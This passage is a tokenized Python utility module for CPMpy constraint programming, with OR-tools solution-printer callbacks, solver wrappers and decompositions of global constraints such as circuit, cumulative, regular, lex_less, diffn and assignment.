self.vars<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end>(a)=self.vars<line_sep>print(f"#{self.solcount}:")<for_stmt>i range(self.rows)<block_start><for_stmt>j range(self.cols)<block_start>print("%3d"%a[i<times>self.cols+j].value() end=" ")<block_end>print()<block_end>print()<if_stmt>self.num_solutions<g>0<and>self.solcount<ge>self.num_solutions<block_start>self.StopSearch()<block_end><block_end><block_end><class_stmt>ORT_simple_function_printer(ort.CpSolverSolutionCallback)<block_start>""" A printer callback with a callback (cb_fun) for printing the array a, which should be structured by the user and including .value() for the variables. Note that the data array a must be a flattening array to be used with this printer callback. 
Example of a printer function: def f(a): print(a[0].value(),"+",a[1].value(),"=",a[2].value()) which will print a solution such as 2 + 3 = 5 """<def_stmt>__init__ self varmap a cb_fun num_solutions=0<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<line_sep>self.cb_fun=cb_fun<line_sep>self.num_solutions=num_solutions<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1<line_sep># For single arrays: <for_stmt>cpm_var self.vars<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end>(a)=self.vars<line_sep>print(f"\n#{self.solcount}:")<line_sep>self.cb_fun(a)<if_stmt>self.num_solutions<g>0<and>self.solcount<ge>self.num_solutions<block_start>self.StopSearch()<block_end><block_end><block_end><class_stmt>ORT_simple_solution_counter(ort.CpSolverSolutionCallback)<block_start>""" This is a solution 'printer' that just count the solutions. """<def_stmt>__init__ self varmap a<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1<for_stmt>wm self.vars<block_start><for_stmt>cpm_var wm<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end><block_end>(a)=self.vars<block_end><block_end><class_stmt>ORT_function_printer_arrays(ort.CpSolverSolutionCallback)<block_start>""" A printer callback with a callback (cb_fun) for printing the array of arrays a, which should be structured by the user and including .value() for the variables. This version t prints solution number. Example of a printer function: def print_solution(a): print('x:', a[0].value()) print('y:', a[1].value()) """<def_stmt>__init__ self varmap a cb_fun num_solutions=0<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<line_sep>self.cb_fun=cb_fun<line_sep>self.num_solutions=num_solutions<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1<for_stmt>wm self.vars<block_start><for_stmt>cpm_var wm<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end><block_end>(a)=self.vars<line_sep>print(f"sol #{self.solcount}")<line_sep>self.cb_fun(a)<line_sep>print()<if_stmt>self.num_solutions<g>0<and>self.solcount<ge>self.num_solutions<block_start>self.StopSearch()<block_end><block_end><block_end><class_stmt>ORT_function_printer_arrays2(ort.CpSolverSolutionCallback)<block_start>""" A printer callback with a callback (cb_fun) for printing the array of arrays a, which should be structured by the user and including .value() for the variables. This version don't print solution number. 
Example of a printer function: def print_solution(a): print('x:', a[0].value()) print('y:', a[1].value()) """<def_stmt>__init__ self varmap a cb_fun num_solutions=0<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<line_sep>self.cb_fun=cb_fun<line_sep>self.num_solutions=num_solutions<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1<for_stmt>wm self.vars<block_start><for_stmt>cpm_var wm<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end><block_end>(a)=self.vars<line_sep>self.cb_fun(a)<if_stmt>self.num_solutions<g>0<and>self.solcount<ge>self.num_solutions<block_start>self.StopSearch()<block_end><block_end><block_end><def_stmt>print_solution a<block_start>""" print_solution(a) Default callback method for printing the solution in a printer callback. Note: a must be an array of arrays to be used with ortools_wrapper (defined below). """<for_stmt>x a<block_start>print(x.value())<block_end><block_end><def_stmt>ortools_wrapper model var_array print_solution=print_solution num_sols=0<block_start>""" ortools_wrapper((model,var_array,print_solution=print_solution,num_sols=0) This is a simple wrapper for printing the solutions of a model and tends to be (significantly) faster than using ss = CPM_ortools(model) while ss.solve(): # ... get_different_solution(ss,flatten_lists(var_array)) Parameters: - model : the model - var_array: the array of arrays of the decision variables to be printed with print_solution(var_array) - print_solution: the method used to do the actual printing of the solution. Default is print_solution(a) defined above. The function can be overwritten / defined in the current constraint model. - num_sols : number of solutions. Default 0, all solutions. Note: For optimality problems, use ortools_wrapper_opt(.) instead. """<line_sep>ss=CPM_ortools(model)<line_sep>cb=ORT_function_printer_arrays(ss.varmap var_array print_solution num_sols)<line_sep># Flags to experiment with # ss.ort_solver.parameters.num_search_workers = 8 # Don't work together with SearchForAllSolutions # ss.ort_solver.parameters.search_branching = ort.PORTFOLIO_SEARCH # ss.ort_solver.parameters.cp_model_presolve = False ss.ort_solver.parameters.linearization_level=0<line_sep>ss.ort_solver.parameters.cp_model_probing_level=0<line_sep>ort_status=ss.ort_solver.SearchForAllSolutions(ss.ort_model cb)<line_sep>ss._after_solve(ort_status)<line_sep>print(ss.status())<line_sep>print("Nr solutions:" cb.solcount)<line_sep>print("Num conflicts:" ss.ort_solver.NumConflicts())<line_sep>print("NumBranches:" ss.ort_solver.NumBranches())<line_sep>print("WallTime:" ss.ort_solver.WallTime())<line_sep>print()<block_end><def_stmt>ortools_wrapper2 model var_array print_solution=print_solution num_sols=0<block_start>""" ortools_wrapper((model,var_array,print_solution=print_solution,num_sols=0) This is a simple wrapper for printing the solutions of a model and tends to be (significantly) faster than using ss = CPM_ortools(model) while ss.solve(): # ... get_different_solution(ss,flatten_lists(var_array)) This version don't print the solution number. Parameters: - model : the model - var_array: the array of arrays of the decision variables to be printed with print_solution(var_array) - print_solution: the method used to do the actual printing of the solution. Default is print_solution(a) defined above. The function can be overwritten / defined in the current constraint model. - num_sols : number of solutions. Default 0, all solutions. 
Note: For optimality problems, use ortools_wrapper_opt(.) instead. """<line_sep>ss=CPM_ortools(model)<line_sep>cb=ORT_function_printer_arrays2(ss.varmap var_array print_solution num_sols)<line_sep># Flags to experiment with # ss.ort_solver.parameters.num_search_workers = 8 # Don't work together with SearchForAllSolutions # ss.ort_solver.parameters.search_branching = ort.PORTFOLIO_SEARCH # ss.ort_solver.parameters.cp_model_presolve = False ss.ort_solver.parameters.linearization_level=0<line_sep>ss.ort_solver.parameters.cp_model_probing_level=0<line_sep>ort_status=ss.ort_solver.SearchForAllSolutions(ss.ort_model cb)<line_sep>print()<line_sep>ss._after_solve(ort_status)# post-process after solve() call... print(ss.status())<line_sep>print("Nr solutions:" cb.solcount)<line_sep>print("Num conflicts:" ss.ort_solver.NumConflicts())<line_sep>print("NumBranches:" ss.ort_solver.NumBranches())<line_sep>print("WallTime:" ss.ort_solver.WallTime())<line_sep>print()<block_end><def_stmt>ortools_wrapper_opt model var_array print_solution=print_solution num_sols=1 num_procs=1<block_start>""" ortools_wrapper_opt((model,var_array,print_solution=print_solution,num_sols=0) This is a simple wrapper for printing the _optimal_ solution of a model. This tends to be (significantly) faster than using if model.solve(): # ... Parameters: - model : the model - var_array: the array of arrays of the decision variables to be printed with print_solution(var_array) - print_solution: the method used to do the actual printing of the solution. Default is print_solution(a) defined above. The function can be overwritten / defined in the current constraint model. - num_sols : number of solutions. Default 0, all solutions. """<line_sep>ss=CPM_ortools(model)<line_sep>cb=ORT_function_printer_arrays(ss.varmap var_array print_solution 1)<line_sep># Flags to experiment with <if_stmt>num_procs<g>1<block_start>ss.ort_solver.parameters.num_search_workers=num_procs<block_end># ss.ort_solver.parameters.search_branching = ort.PORTFOLIO_SEARCH # ss.ort_solver.parameters.cp_model_presolve = False ss.ort_solver.parameters.linearization_level=0<line_sep>ss.ort_solver.parameters.cp_model_probing_level=0<line_sep># Note: This is the real difference between this method and ortool_wrapper. # For optimal problems one cannot use SearchForAllSolutions. Instead # one must use ss.ort_solver.Solve(,) # ort_status = ss.ort_solver.SearchForAllSolutions(ss.ort_model, cb) ort_status=ss.ort_solver.Solve(ss.ort_model cb)<line_sep>ss._after_solve(ort_status)# post-process after solve() call... print(ss.status())<line_sep>print("Nr solutions:" cb.solcount)<line_sep>print("Num conflicts:" ss.ort_solver.NumConflicts())<line_sep>print("NumBranches:" ss.ort_solver.NumBranches())<line_sep>print("WallTime:" ss.ort_solver.WallTime())<line_sep>print()<block_end><def_stmt>ortools_wrapper_count_solutions model var_array<block_start>""" ortools_wrapper((model,var_array,print_solution=print_solution,num_sols=0) This is a simple wrapper for just counting the solutions of a model. 
Parameters: - model : the model - var_array: the array of arrays of the decision variables to be printed with print_solution(var_array) """<line_sep>ss=CPM_ortools(model)<line_sep>cb=ORT_simple_solution_counter(ss.varmap var_array)<line_sep># Flags to experiment with # ss.ort_solver.parameters.num_search_workers = 8 # Don't work together with SearchForAllSolutions # ss.ort_solver.parameters.search_branching = ort.PORTFOLIO_SEARCH # ss.ort_solver.parameters.cp_model_presolve = False ss.ort_solver.parameters.linearization_level=0<line_sep>ss.ort_solver.parameters.cp_model_probing_level=0<line_sep>ort_status=ss.ort_solver.SearchForAllSolutions(ss.ort_model cb)<line_sep>ss._after_solve(ort_status)<line_sep><return>cb.solcount<block_end><def_stmt>base_array n<block_start>""" Returns an array of length `n` with base coefficients. Example: `base_array(4)` returns the array [1000,100,10,1] """<line_sep><return>np.array([10<power>i<for>i range(n-1 -1 -1)])<block_end><def_stmt>scalar_product a b<block_start>""" `scalar_product(a,b)` Returns the scalar product of the arrays `a` and `b`. Assumption: `len(a) == len(b)` """<assert_stmt>len(a)<eq>len(a) f"len(a) == len(b)"<line_sep># return np.dot(a,b) <return>sum(a<times>b)<block_end><def_stmt>scalar_product1 a<block_start>""" `scalar_product1(a)` Returns the scalar product of the array `a` and a base_array of appropriate length. Assumption: `len(a) == len(b)` """<assert_stmt>len(a)<eq>len(a) f"len(a) == len(b)"<line_sep># return np.dot(a,base_array(len(a))) <return>sum(a<times>base_array(len(a)))<block_end><def_stmt>my_circuit x<block_start>""" circuit(x) Exsures that x is a circuit. Note: This assumes that x is has the domain 0..len(x)-1, i.e. 0-based. """<assert_stmt>x[0].lb<eq>0 f"circuit: lb is {x[0].lb}, but must be 0"<line_sep>n=len(x)<line_sep>z=intvar(0 n-1 shape=n name='z')<line_sep>constraints=[AllDifferent(x) AllDifferent(z) # put the orbit of x[0] in in z[1..n] z[0]<eq>x[0] [z[i]<eq>x[z[i-1]]<for>i range(1 n-1)] # may not be 0 for i < n-1 [z[i]<ne>0<for>i range(1 n-1)] # when i = n-1 it must be 0 z[n-1]<eq>0]<line_sep><return>constraints<block_end><def_stmt>my_circuit_path x z<block_start>""" circuit(x,z) Ensures that x is an circuit and z is the path. Note: This assumes that x is has the domain 0..len(x)-1, i.e. 0-based. """<assert_stmt>x[0].lb<eq>0 f"circuit: x[0].lb is {x[0].lb}, but must be 0"<line_sep>n=len(x)<line_sep>constraints=[AllDifferent(x) AllDifferent(z) # put the orbit of x[0] in in z[1..n] z[0]<eq>x[0] [z[i]<eq>x[z[i-1]]<for>i range(1 n-1)] # may not be 0 for i < n-1 [z[i]<ne>0<for>i range(1 n-1)] # when i = n-1 it must be 0 z[n-1]<eq>0]<line_sep><return>constraints<block_end><def_stmt>count a val c<block_start>""" count(a,val,c) c is the number of occurrences of val in array a. """<line_sep><return>[c<eq>sum([a[i]<eq>val<for>i range(len(a))])]<block_end><def_stmt>atmost a val c<block_start>""" atmost(a,val,c) Ensure that the number of occurrences of val in a is atmost c. """<line_sep><return>[sum([a[i]<eq>val<for>i range(len(a))])<le>c]<block_end><def_stmt>atleast a val c<block_start>""" atleast(a,val,c) Ensure that the number of occurrences of val in a is atmost c. """<line_sep><return>[sum([a[i]<eq>val<for>i range(len(a))])<ge>c]<block_end><def_stmt>exactly a val c<block_start>""" exactly(a,val,c) Ensure that the number of occurrences of val in a is exactly c. 
"""<line_sep><return>[sum([a[i]<eq>val<for>i range(len(a))])<eq>c]<block_end><def_stmt>global_cardinality_count a gcc<block_start>""" global_cardinality_count(a,gcc) Global cardinality count: Collect the number of occurrences of each value 0..a.ub in gcc. The array gcc must be of length 0..ub. """<line_sep>n=len(a)<line_sep>ub=max([a[i].ub<for>i range(n)])<line_sep>constraints=[]<for_stmt>i range(ub+1)<block_start>constraints<augadd>[count(a i gcc[i])]<block_end><return>constraints<block_end><def_stmt>inverse x y<block_start>""" inverse(x,y) Ensures that: x[i] == j #<=> y[j] == i Note: inverse(x,y) is sometimes called assignment(x,y). There is an alternative version: inverse(x) which can be simulated by inverse(x,x) """<line_sep>n=len(x)<assert_stmt>n<eq>len(y) "x and y must be of equal length"<line_sep>constraints=[]<for_stmt>i range(n)<block_start><for_stmt>j range(n)<block_start>constraints<augadd>[(x[i]<eq>j)<eq>(y[j]<eq>i)]<block_end><block_end><return>constraints<block_end><def_stmt>my_cumulative s d r b<block_start>""" Decompositon of cumulative. Inspired by the MiniZinc implementation. The MiniZinc decomposition is discussed in the paper: <NAME>, <NAME>, <NAME>, and <NAME>. 'Why cumulative decomposition is not as bad as it sounds.' Parameters: s: start_times assumption: array of varint d: durations assumption: array of int r: resources assumption: array of int b: resource limit assumption: varint or int """<line_sep>constraints=[]<line_sep>max_d=max(d)<line_sep>tasks=[i<for>i range(len(s))<if>r[i]<g>0<and>d[i]<g>0]<line_sep>times_min=min([s[i].lb<for>i tasks])<line_sep>times_max=max([s[i].ub+max_d<for>i tasks])<for_stmt>t range(times_min times_max+1)<block_start>constraints<augadd>[b<ge>sum([((s[i]<le>t)&(t<l>s[i]+d[i]))<times>r[i]<for>i tasks])]<block_end># Somewhat experimental: # This constraint is needed to contrain the upper limit of b. <if_stmt><not>isinstance(b int)<block_start>constraints<augadd>[b<le>sum(r)]<block_end><return>constraints<block_end><def_stmt>member_of x val<block_start>""" member_of(x, val) Ensures that the value `val` is in the array `x`. """<line_sep>n=len(x)<line_sep># cc = intvar(0,n) # constraints = [count(x, val, cc), cc > 0] constraints=[sum([x[i]<eq>val<for>i range(n)])<g>0]<line_sep><return>constraints<block_end><def_stmt>regular x Q S d q0 F<block_start>""" Global constraint regular This is a translation of MiniZinc's regular constraint (defined in lib/zinc/globals.mzn), via the Comet code refered above. All comments are from the MiniZinc code. ''' The sequence of values in array 'x' (which must all be in the range 1..S) is accepted by the DFA of 'Q' states with input 1..S and transition function 'd' (which maps (1..Q, 1..S) -> 0..Q)) and initial state 'q0' (which must be in 1..Q) and accepting states 'F' (which all must be in 1..Q). We reserve state 0 to be an always failing state. ''' x : IntVar array Q : number of states S : input_max d : transition matrix q0: initial state F : accepting states Note: As mentioned above the states must start at 1 since 0 is represents a failed state. Note: Compare with regular_table which use the Table constraints instead of Element constraint in the main loop. """<assert_stmt>Q<g>0 'regular: "Q" must be greater than zero'<assert_stmt>S<g>0 'regular: "S" must be greater than zero'<line_sep># d2 is the same as d, except we add one extra transition for # each possible input; each extra transition is from state zero # to state zero. This allows us to continue even if we hit a # non-accepted input. 
d2=[]<for_stmt>i range(Q+1)<block_start>row=[]<for_stmt>j range(S)<block_start><if_stmt>i<eq>0<block_start>row.append(0)<block_end><else_stmt><block_start>row.append(d[i-1][j])<block_end><block_end>d2.append(row)<block_end>d2_flatten=[d2[i][j]<for>i range(Q+1)<for>j range(S)]<line_sep># If x has index set m..n, then a[m-1] holds the initial state # (q0), and a[i+1] holds the state we're in after processing # x[i]. If a[n] is in F, then we succeed (ie. accept the # string). x_range=list(range(0 len(x)))<line_sep>m=0<line_sep>n=len(x)<line_sep>a=[intvar(0 Q+1)<for>i range(m n+1)]<line_sep>constraints=[]<line_sep># Check that the final state is in F constraints<augadd>[member_of(F a[-1])]<line_sep># First state is q0 constraints<augadd>[a[m]<eq>q0]<for_stmt>i x_range<block_start>constraints<augadd>[x[i]<ge>1]<line_sep>constraints<augadd>[x[i]<le>S]<line_sep># Determine a[i+1]: a[i+1] == d2[a[i], x[i]] constraints<augadd>[a[i+1]<eq>Element(d2_flatten (a[i])<times>S+(x[i]-1))]<block_end><return>constraints<block_end><def_stmt>regular_table x Q S d q0 F<block_start>""" Global constraint regular_table This is a translation of MiniZinc's regular constraint (defined in lib/zinc/globals.mzn), via the Comet code refered above. All comments are from the MiniZinc code. ''' The sequence of values in array 'x' (which must all be in the range 1..S) is accepted by the DFA of 'Q' states with input 1..S and transition function 'd' (which maps (1..Q, 1..S) -> 0..Q)) and initial state 'q0' (which must be in 1..Q) and accepting states 'F' (which all must be in 1..Q). We reserve state 0 to be an always failing state. ''' x : IntVar array Q : number of states S : input_max d : transition matrix q0: initial state F : accepting states Note: As mentioned above the states must start at 1 since 0 is represents a failed state. The difference between this version (regular_table) and regular is that this version use Table constraint instead of Element constraint. """<assert_stmt>Q<g>0 'regular: "Q" must be greater than zero'<assert_stmt>S<g>0 'regular: "S" must be greater than zero'<line_sep># d2 is the same as d, except we add one extra transition for # each possible input; each extra transition is from state zero # to state zero. This allows us to continue even if we hit a # non-accepted input. d2=[]<for_stmt>i range(Q+1)<block_start>row=[]<for_stmt>j range(S)<block_start><if_stmt>i<eq>0# This is different from regular(.) <block_start>row.append((0 j 0))<block_end><else_stmt># This is different from regular(.) <block_start>row.append((i j d[i-1][j]))<block_end><block_end>d2.append(row)<block_end>d2_flatten=[d2[i][j]<for>i range(Q+1)<for>j range(S)]<line_sep># If x has index set m..n, then a[m-1] holds the initial state # (q0), and a[i+1] holds the state we're in after processing # x[i]. If a[n] is in F, then we succeed (ie. accept the # string). x_range=list(range(0 len(x)))<line_sep>m=0<line_sep>n=len(x)<line_sep>a=[intvar(0 Q+1)<for>i range(m n+1)]<line_sep>constraints=[]<line_sep># Check that the final state is in F constraints<augadd>[member_of(F a[-1])]<line_sep># First state is q0 constraints<augadd>[a[m]<eq>q0]<line_sep>x_lb,x_ub=get_min_max_domain(x)<for_stmt>i x_range<block_start>constraints<augadd>[x[i]<ge>1]<line_sep>constraints<augadd>[x[i]<le>S]<line_sep># Determine a[i+1]: a[i+1] == d2[a[i], x[i]] xi1=intvar(0 x_ub)<line_sep>constraints<augadd>[# These two constraints are different # from regular(.) 
xi1<eq>x[i]-1 Table((a[i] xi1 a[i+1]) d2_flatten)]<block_end><return>constraints<block_end><def_stmt>lex_less x y<block_start>""" lex_less(x,y) Ensures that the array 'x' is strictly lexicographically less than array 'y'. Compares them from first to last element, regardless of indices This is a port of MiniZinc's definition lex_less_int https://github.com/MiniZinc/libminizinc/blob/master/share/minizinc/std/fzn_lex_less_int.mzn Note that we simplify the calculation of lx and ly since cpmpy has start index 0 (in MiniZinc the start index can be user defined). """<line_sep>xlen=len(x)<line_sep>ylen=len(y)<line_sep>ux=xlen<line_sep>uy=ylen<line_sep>size=min([ux uy])<line_sep># Do not name variables in global constraints # since then the variables are not unique. # b = boolvar(shape=size+1,name="b") b=boolvar(shape=size+1)<line_sep>constraints=[]<line_sep>constraints<augadd>[b[0]<eq>1]<for_stmt>i range(size)<block_start>constraints<augadd>[b[i]<eq>((x[i]<le>y[i])&((x[i]<l>y[i])|(b[i+1]<eq>1)))]<block_end>constraints<augadd>[b[size]<eq>(ux<l>uy)]<line_sep><return>constraints<block_end><def_stmt>lex_greater x y<block_start>""" lex_greater(x,y) Ensures that the array 'x' is strictly lexicographically greater than array 'y'. Compares them from first to last element, regardless of indices. This constraint is defined by lex_less(y,x) defined above . """<line_sep><return>lex_less(y x)<block_end><def_stmt>lex2 x<block_start>""" lex2(x) Ensures that the rows and columns in the matrix `x` are increasing, using lex_less. """<line_sep>x_t=x.transpose()<line_sep><return>[[lex_less(x[i] x[i+1])<for>i range(len(x)-1)] [lex_less(x_t[i] x_t[i+1])<for>i range(len(x_t)-1)]]<block_end># # Somewhat general definition of knapsack. # <def_stmt>knapsack values weights n<block_start>""" knapsack(values, weights, n) Creates a model for the knapsack problem with the values, weights and limit n. See knapsack.py for usage of this. """<line_sep>z=intvar(0 10000 name="z")<line_sep>x=intvar(0 1 shape=len(values) name="x")<line_sep>model=Model([z<ge>0 z<eq>sum(x<times>values) sum(x<times>weights)<le>n ] maximize=z)<line_sep><return>[model x z]<block_end><def_stmt>my_abs x y d<block_start>""" A decomposition of abs() for experimentation. """<line_sep>constraints=[]<line_sep>b=boolvar()<line_sep>constraints<augadd>[b<eq>(x<ge>y)]<line_sep>constraints<augadd>[(b).implies(d<eq>x-y)]<line_sep>constraints<augadd>[(~b).implies(d<eq>y-x)]<line_sep><return>constraints<block_end><def_stmt>my_abs2 x y<block_start>""" A decomposition of abs() for experimentation. """<line_sep>constraints=[]<line_sep>b=boolvar()<line_sep>d=intvar(0 1000000)<line_sep>constraints<augadd>[b<eq>(x<ge>y)]<line_sep>constraints<augadd>[(b).implies(d<eq>x-y)]<line_sep>constraints<augadd>[(~b).implies(d<eq>y-x)]<line_sep><return>d<block_end><def_stmt>prod x res<block_start>""" prod(x,res) res is the product of the values in x. """<line_sep><return>[reduce(<lambda>a b:a<times>b x)<eq>res]<block_end><def_stmt>prod1 x<block_start>""" prod1(x) return the product of the values in x. """<line_sep><return>reduce(<lambda>a b:a<times>b x)<block_end><def_stmt>among m x v<block_start>""" among(m,x,v) Requires exactly m variables in x to take one of the values in v. 
"""<line_sep><return>[m<eq>sum([x[i]<eq>j<for>i range(len(x))<for>j v])]<block_end># # Symmetry breaking # # From # http://en.wikipedia.org/wiki/Fr#C3#A9nicle_standard_form # """ # A magic square is in Frénicle standard form, named for # <NAME>, if the following two conditions apply: # - the element at position [1,1] (top left corner) is the smallest # of the four corner elements; and # - the element at position [1,2] (top edge, second from left) is # smaller than the element in [2,1]. # """ # <def_stmt>frenicle x n<block_start>constraints=[x[(0 0)]<eq>min([x[0 0] x[0 n-1] x[n-1 0] x[n-1 n-1]])]<line_sep>constraints<augadd>[x[0 1]<l>x[1 0]]<line_sep><return>constraints<block_end><def_stmt>distribute card value base<block_start>""" distribute(card, value, base) Requires that 'card[i]' is the number of occurences of 'value[i]' in 'base'. Note: card, value, and base are assumed to be intvar arrays. """<line_sep>card_len=len(card)<line_sep>value_len=len(value)<assert_stmt>card_len<eq>value_len "`card` and `value` must have the same length"<line_sep>base_len=len(base)<line_sep>constraints=[]<line_sep>constraints<augadd>[AllDifferent(value)]<for_stmt>i range(card_len)<block_start>constraints<augadd>[card[i]<eq>sum([value[i]<eq>base[j]<for>j range(base_len)])]<block_end><return>constraints<block_end><def_stmt>fill_array x x_val<block_start>""" fill_array(x,x_val) If x_val[i] != None then x[i] == x_val[i]. """<line_sep>constraints=[]<for_stmt>i range(len(x))<block_start><if_stmt>x_val[i]<ne><none><block_start>constraints<augadd>[x[i]<eq>x_val[i]]<block_end><block_end><return>constraints<block_end><def_stmt>all_different_pairs a s<block_start>""" all_different_pairs(a, s) all pairs must be different """<line_sep><return>[AllDifferent([p<for>p pairs(a s)])]<block_end><def_stmt>increasing_pairs a s<block_start>""" increasing_pairs(a, s) Ensure that the pairs are in increasing order. """<line_sep><return>[increasing(pairs(a s))]<block_end><def_stmt>decreasing_pairs a s<block_start>""" decreasing_pairs(a, s) Ensure that the pairs are in decreasing order. """<line_sep><return>[decreasing(pairs(a s))]<block_end><def_stmt>pairs a s<block_start>""" return the pairs of a in the 'integer representation': a[k,0]*(n-1) + a[k,1] s is the size of max value of n """<line_sep>n=len(a)<line_sep><return>[a[(k 0)]<times>(s-1)+a[(k 1)]<for>k range(n)]<block_end><def_stmt>all_min_dist min_dist x n<block_start>""" all_min_dist(min_dist, x, n) Ensures that the differences of all pairs (i !=j) are >= min_dist. """<line_sep>constraints=[]<for_stmt>i range(n)<block_start><for_stmt>j range(i)<block_start>constraints<augadd>[abs(x[i]-x[j])<ge>min_dist]<block_end><block_end># Nope! <return>constraints<block_end><def_stmt>all_different_on_intersection x y<block_start>""" all_different_on_intersection(x, y) Ensure that the values that are common in x and y are distinct (in each array). 
"""<line_sep><return>[count_a_in_b(x y) count_a_in_b(y x)]<block_end><def_stmt>count_a_in_b ass bss<block_start>""" count_a_in_b(ass,bss) helper for all_different_on_intersection """<line_sep>constraints=[]<for_stmt>a ass<block_start>constraints<augadd>[sum([a<eq>b<for>b bss])<le>1]<block_end><return>constraints<block_end><def_stmt>all_different_modulo x m<block_start>""" all_different_modulo(x, m) Ensure that all elements in x (modulo m) are distinct """<line_sep>print("x2:" x)<line_sep>n=len(x)<line_sep>constraints=[]<line_sep>mods=intvar(0 m-1 shape=n)<for_stmt>i range(n)<block_start>constraints<augadd>[mods[i]<eq>x[i]%m]<block_end>constraints<augadd>[AllDifferent(mods)]<line_sep><return>constraints<block_end><def_stmt>all_different_cst xs cst<block_start>""" all_different_cst(xs, cst) Ensure that all elements in xs + cst are distinct """<line_sep><return>[AllDifferent([(x+c)<for>(x c) zip(xs cst)])]<block_end><def_stmt>arith x relop val<block_start>""" arith(x, relop, val) Ensure that all elements in x are <relop> val. """<line_sep>constraints=[]<for_stmt>i range(len(x))<block_start>constraints<augadd>[arith_relop(x[i] relop val)]<block_end><return>constraints<block_end><def_stmt>arith_relop a t b<block_start>""" arith_relop(a, t, b) This is (arguably) a hack. Represents each function as an integer 0..5. """<line_sep><return>[(t<eq>0).implies(a<l>b) (t<eq>1).implies(a<le>b) (t<eq>2).implies(a<eq>b) (t<eq>3).implies(a<ge>b) (t<eq>4).implies(a<g>b) (t<eq>5).implies(a<ne>b)]<block_end># # diffn ported from MiniZinc's fzn_diffn: # <def_stmt>diffn x y dx dy<block_start>""" diffn(x,y,dx,dy) Constrains rectangles i, given by their origins x[i], y[i]) and sizes (dx[i], dy[i]), to be non-overlapping. Zero-width rectangles can still not overlap with any other rectangle. """<line_sep>n=len(x)<line_sep>constraints=[]<for_stmt>i range(n)<block_start><for_stmt>j range(i+1 n)<block_start>constraints<augadd>[(x[i]+dx[i]<le>x[j])|(y[i]+dy[i]<le>y[j])|(x[j]+dx[j]<le>x[i])|(y[j]+dy[j]<le>y[i])]<block_end><block_end><return>constraints<block_end><def_stmt>nvalue m x<block_start>""" nvalue(m, x) Requires that there is exactly m distinct values in x (min_val and max_val are the minimum and maximum value in x, respectively) """<line_sep>n=len(x)<line_sep>min_val=min([x[i].lb<for>i range(n)])<line_sep>max_val=max([x[i].ub<for>i range(n)])<line_sep><return>(m<eq>sum([sum([x[j]<eq>i<for>j range(n)])<g>0<for>i range(min_val max_val+1)]))<block_end># # nvalues(x,op,n) # # Requires that the number of distinct values in the array x is # op n # where # op is either one of # =, <m, =<, >=, > # <def_stmt>nvalues x op n<block_start>xlen=len(x)<line_sep>m=intvar(1 xlen)<line_sep><return>[nvalue(m x) arith_relop(m op n)]<block_end><def_stmt>clique g clique card<block_start>""" clique(g, clique, card) Ensure that the boolean array 'clique' (of Integer Array type) represents a clique in the graph g with the cardinality card. Note: This is kind of backward, but it is the whole thing: If there is a connection between nodes I and J (I != J) then there should be a node from I to J in G. If it's not then both c1 and c2 is not in the clique. 
"""<line_sep>n=len(g)<line_sep>constraints=[]<line_sep>constraints<augadd>[card<eq>sum([clique[i]<for>i range(n)])]<for_stmt>(c1 i) zip(clique range(n))<block_start><for_stmt>(c2 j) zip(clique range(n))<block_start><if_stmt>i<ne>j<and>g[i][j]<eq>0<block_start>constraints<augadd>[(c1<eq>0)|(c2<eq>0)]<block_end><block_end><block_end><return>constraints<block_end><def_stmt>assignment_model cost tasks=<none> people=<none> print_solution=<none> opt="min"<block_start>""" assignment_model(cost, rows, cols, tasks=None,people=None,print_solution=None,opt='min'): Fairly general implementation of the assignment problem: Minimize total cost of assign all task to one person given the cost of assigning a person to the tasks. For problems were 'task' and 'people' does not applies, a used-defined method 'print_solution' can be used. For maximization problems, use opt='max'. """<line_sep>rows=len(cost)<line_sep>cols=len(cost[0])<line_sep>max_cost=np.sum(np.array(cost))<line_sep>total_cost=intvar(0 max_cost name='cost')<line_sep>x=boolvar(shape=(rows cols) name="x")<line_sep>model=Model(total_cost<ge>0 total_cost<eq>np.sum([x_row<times>cost_row<for>(x_row cost_row) zip(x cost)]) # exacly one assignment per row, all rows (tasks) must be assigned. [sum(row)<eq>1<for>row x] # zero or one assignments per column (people) [sum(col)<le>1<for>col x.transpose()] )<if_stmt>opt<eq>"max"<block_start>model.maximize(total_cost)<block_end><else_stmt><block_start>model.minimize(total_cost)<block_end>ss=CPM_ortools(model)<if_stmt>ss.solve()<block_start>print("total_cost: " total_cost.value())<line_sep>print("x:")<line_sep>print(x.value())<line_sep>print()<if_stmt>tasks<eq><none><and>people<eq><none><block_start><for_stmt>i range(rows)<block_start>print("Task" i end="")<for_stmt>j range(cols)<block_start><if_stmt>x[i][j].value()<eq>1<block_start>print(" is done by " j)<block_end><block_end><block_end>print()<block_end><else_stmt><block_start><if_stmt>print_solution<ne><none><block_start>print_solution(x.value() tasks people)<block_end><else_stmt><block_start><for_stmt>i range(rows)<block_start>print("Task" tasks[i] end="")<for_stmt>j range(cols)<block_start><if_stmt>x[i][j].value()<eq>1<block_start>print(" is done by" people[j])<block_end><block_end><block_end>print()<block_end><block_end><block_end><block_end><def_stmt>latin_square x<block_start>""" latin_square(x) The matrix x is a Latin square. """<line_sep><return>[[AllDifferent(row)<for>row x] [AllDifferent(col)<for>col x.transpose()]]<block_end># # reverses an array from -> to # <def_stmt>reverse xfrom xto<block_start>""" reverse(xfrom, xto) xto is reverse of xfrom. """<line_sep>n=len(xfrom)<line_sep><return>[xto[i]<eq>xfrom[n-i-1]<for>i range(n)]<block_end><def_stmt>print_model_and_variables model<block_start>""" print_model_and_variables(model) Prints the following: - the unflattened model (via print(model)) - the flattened model - the variables and the domains in the flattened model (From <NAME> when he debugged one of my models. Thanks, Tias!) """<line_sep>print("Model:")<line_sep>print(model)<line_sep>print("\nFlattened model and 